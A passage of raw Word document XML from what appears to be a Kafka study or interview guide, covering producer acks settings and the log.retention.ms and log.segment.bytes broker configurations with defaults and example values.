        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00E2623E"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erformance &gt; Reliability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07DFA21E"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acks=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="221177BB" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26BCC79E"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Balanced trade-off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3342BB20"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acks=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="7DC4F429" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="132B0C80"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Durability &gt; Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758B583C" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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acks=all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="281411C6" w14:textId="4182E89E"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D035251">
          <v:rect id="_x0000_i3300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA9B3E" w14:textId="4D2BE90E" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E20B60" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="820" w:name="_Toc196308300"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the significance of "log.retention.ms" and "log.segment.bytes" configurations in Kafka</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="820"/>
    </w:p>
    <w:p w14:paraId="6742F090" w14:textId="355DF8CE" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00CA1148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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The log.retention.ms and log.segment.bytes are two critical Kafka broker configurations that directly influence </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data retention</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disk space usage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13A9FE" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="006257DC">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0A4A708">
          <v:rect id="_x0000_i3301" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D3B69" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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log.retention.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308CDF39" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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What it does:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retention period (in milliseconds)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a Kafka topic's log segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C4A67" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Defines how </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>long Kafka should retain messages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before they are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F09D7" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Default value:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 days (604800000 ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62494E53" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314EC276" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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log.retention.ms=86400000  # 1 day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586E975" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Messages </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>older than this threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are deleted </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regardless of whether they were consumed</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or not (unless log compaction is used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6F703" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="006257DC">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7A8A131">
          <v:rect id="_x0000_i3302" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EE8D5" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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log.segment.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA71CCE" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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What it does:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maximum size (in bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a single </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segment file</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508D432" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Controls how big each log segment file can get before Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rolls over and creates a new segment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC12EF9" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Default value:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 GB (1073741824 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433D1C3" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7302EE5E" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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log.segment.bytes=134217728  # 128 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F85C2" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Affects how often </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segment files are created</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and also </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how granular retention cleanup can be</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, since Kafka only deletes </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not individual messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B35D4" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="006257DC">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B3CB2FC">
          <v:rect id="_x0000_i3303" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CAB07" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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How They Work Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A2168" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deletes old log segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30306D5F" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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log.retention.ms (time-based),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE0A024" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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log.retention.bytes (size-based), or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C5B9E" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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log.retention.hours (alternative to ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803B4BC" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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Kafka deletes </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire log segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01395F33" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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The </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segment’s last message timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is older than log.retention.ms, AND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1105E545" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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The segment is not the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>active segment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> being written to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A395552" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="006257DC">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2AB53C0">
          <v:rect id="_x0000_i3304" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="748AF42E" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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Use Case Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6728D" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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If you want to retain logs for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 days</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and want smaller segment files to reduce deletion latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05254166" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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log.retention.ms=259200000     # 3 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014AA60C" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC" w:rsidP="006257DC">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log.segment.bytes=67108864     # 64 MB</w:t>
      </w:r>
    </w:p>
